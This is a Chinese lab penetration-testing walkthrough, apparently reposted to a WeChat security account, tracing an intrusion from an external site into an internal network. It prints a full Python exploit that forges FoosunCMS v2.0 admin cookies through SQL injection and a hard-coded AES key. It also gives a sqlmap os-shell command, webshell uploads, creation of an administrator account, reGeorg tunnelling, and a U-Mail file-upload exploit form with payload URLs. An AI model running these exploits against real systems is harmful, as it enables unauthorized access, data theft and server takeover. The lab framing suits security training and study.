模拟从外网到内网漫游的实验过程

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


原文地址:

https://blog.csdn.net/weixin_44991517/article/details/91355442


声明:此次渗透环境为实验环境,仅供渗透实验参考


内网漫游拓扑图

模拟从外网到内网漫游的实验过程

利用登录绕过漏洞进行后台

目标网站ip:192.168.31.55,将目标网站ip绑定到本地hosts文件下的www.test.com下(防止直接访问ip网站加载不全),访问www.test.com得到网站首页,发现是一个html静态网站

模拟从外网到内网漫游的实验过程


经过点击发现该网站是FoosunCMS搭建的经过点击发现该网站是FoosunCMS搭建的

模拟从外网到内网漫游的实验过程


版本为v2.0,存在可以利用的漏洞,绕过管理员账号信息验证,直接进入后台,可谓是非常危险的一个利用漏洞,访问网站后台地址:/manage/Index.aspx

模拟从外网到内网漫游的实验过程


搜索发现FoosunCMS v2.0有一个登录绕过漏洞,尝试登录绕过,访问下面链接得到UserNumber

http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
模拟从外网到内网漫游的实验过程


发现得将UserNumber加密后拼接成cookie即可成功登录

模拟从外网到内网漫游的实验过程


直接用sql注入拿到UserNumber,然后再与UserName等拼接,构造cookie直接以管理员权限登录,Exp代码如下:

#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword:####inurl:/manage/Login.aspx   #################################KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'def parse_args():  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")  return parser.parse_args()def run(url):  try:      usernumber = get_usernumber(url)      if usernumber is not None:          encrypt_cookie = generate_cookie(usernumber)          #写入cookie中          write_cookie(url, encrypt_cookie)  except Exception:      traceback.print_exc()def get_usernumber(url):  fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"  content = urllib.urlopen(fullurl).read()  index = content.index("<option value="")  if  index != -1:      usernumber = content[index+15:]      usernumber = usernumber[0: content.index(""")+1]      print "Get usernumber success. Usernumber is :", usernumber      return usernumber  else:      print "Get usernumber fail"      return Nonedef pkcs7padding(data):  bs = AES.block_size  padding = bs - len(data) % bs  padding_text = chr(padding) * padding  return data + padding_textdef generate_cookie(usernumber):  orgstr = "%s,admin,0,1,False"%(usernumber,)  cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])  ciphertext = cryptor.encrypt(pkcs7padding(orgstr))  ciphertext = base64.b64encode(ciphertext)  return ciphertextdef write_cookie(url, ciphercookie):  print "Generate Cookie[SITEINFO]:", ciphercookie  print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)if __name__ == '__main__':  args = parse_args()  try:      if args.url is not None:          run(args.url[0])  except Exception, e:      print "python Foosun_exp.py -u 
"


执行后成功得到加密的绕过后台登录cookie

模拟从外网到内网漫游的实验过程


将脚本打印的加密Cookie用EditThisCookie写入浏览器Cookie

模拟从外网到内网漫游的实验过程


然后访问http://www.test.com/manage/Index.aspx即可成功进入后台

模拟从外网到内网漫游的实验过程


注意:

如果在执行exp脚本的时候出现以下情况,则需要安装python Crypto.Cipher加密包

模拟从外网到内网漫游的实验过程


安装加密包

pip install pycryptodome


利用文件上传漏洞获取shell

进入后台后发现控制面板>系统参数设置>上传处可修改上传文件允许格式,在里面加入aspx格式

模拟从外网到内网漫游的实验过程

在插件管理>广告系统>添加广告处可上传文件
模拟从外网到内网漫游的实验过程

尝试上传aspx一句话脚本发现成功上传
模拟从外网到内网漫游的实验过程

并返回上传后的文件路径
模拟从外网到内网漫游的实验过程

利用菜刀成功连接到上传的aspx一句话脚本,但是发现权限不是system权限
模拟从外网到内网漫游的实验过程

尝试利用sqlmap获取交互shell

将上面发现的注入点放进sqlmap跑一下
http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin

利用sqlmap获得交互shell
sqlmap.py -u"http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin" --os-shell
模拟从外网到内网漫游的实验过程

成功获得交互shell并且是system权限
模拟从外网到内网漫游的实验过程

利用sqlmap尝试写入一句话木马(补充:注意转义问题
模拟从外网到内网漫游的实验过程

利用菜刀成功连接
模拟从外网到内网漫游的实验过程

尝试添加用户失败,显示密码不满足密码策略组要求复杂性太低
模拟从外网到内网漫游的实验过程

加强密码复杂性,再次添加用户发现命令执行成功
模拟从外网到内网漫游的实验过程

将添加的用户加入到管理员组
模拟从外网到内网漫游的实验过程

利用Sqlmap交互shell发现该主机ip为192.168.1.123,而不是我们所访问的192.168.31.55。那么有可能是利用了端口转发把不在同一网段的ip转发到了同一网段
模拟从外网到内网漫游的实验过程

设置代理对另一内网进行渗透

内网漫游

通过查看发现其开启了3389端口,利用前面添加的管理员账号密码远程登录3389,发现在administrator管理员用户下桌面上有一个记事本发现了两个账号密码

模拟从外网到内网漫游的实验过程

利用发现的账号登录www.test.com:8080端口的路由界面发现限制了ip登录,我们猜测可能是设置了只能内网ip登录
模拟从外网到内网漫游的实验过程

然后我们在本地设置代理后成功登录,发现是个内网路由网站,登录路由后发现该路由器下还有一个172.19.23.123的网站
模拟从外网到内网漫游的实验过程

这里我们利用kali里的reGeorge+proxychains代理来进行内网渗透,首先设置proxychains的配置文件,打开kali终端输入以下命令,并将dynamic_chain前面的注释符#去掉
vi /etc/proxychains.conf
模拟从外网到内网漫游的实验过程

设置端口
模拟从外网到内网漫游的实验过程

设置好以后保存退出,切换到reGeorg-master文件下
模拟从外网到内网漫游的实验过程

打通代理隧道,返回下面页面则表示代理成功
python reGeorgSocksProxy.py -p 2333 -l 0.0.0.0 -u http://www.test.com/files/tunnel.aspx

模拟从外网到内网漫游的实验过程


使用代理打开Firefox浏览器,注:命令前面加proxychains => 使用代理执行该命令
proxychains firefox

模拟从外网到内网漫游的实验过程


利用上面我们发现的账号密码成功登录该网站
模拟从外网到内网漫游的实验过程

发现这个网站是一个u-mailCMS,我们发现u-mail爆发过一个很严重的文件上传漏洞,可以尝试一下这个网站是否修复了这个漏洞,Exp代码如下:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><FORM name=form1 method=post action="http://172.19.23.123/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>ʏԫτݾú<input type="file" name="Filedata" size="30"><INPUT type=submit value=ʏԫ name=Submit>

使用代理打开构造的html页面,然后上传一个后缀为jpg的php大马

模拟从外网到内网漫游的实验过程


上传成功后回显出文件file_id信息
模拟从外网到内网漫游的实验过程

利用下面payload获取到当前登录的user_id为3
http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk
模拟从外网到内网漫游的实验过程

利用爆出来的user_id和file_id构造出上传的大马文件路径,并利用PHP解析漏洞,路径后面加/.php成功解析
模拟从外网到内网漫游的实验过程



关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读




模拟从外网到内网漫游的实验过程
模拟从外网到内网漫游的实验过程
模拟从外网到内网漫游的实验过程

欢 迎 私 下 骚 扰



模拟从外网到内网漫游的实验过程

本文始发于微信公众号(潇湘信安):模拟从外网到内网漫游的实验过程

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: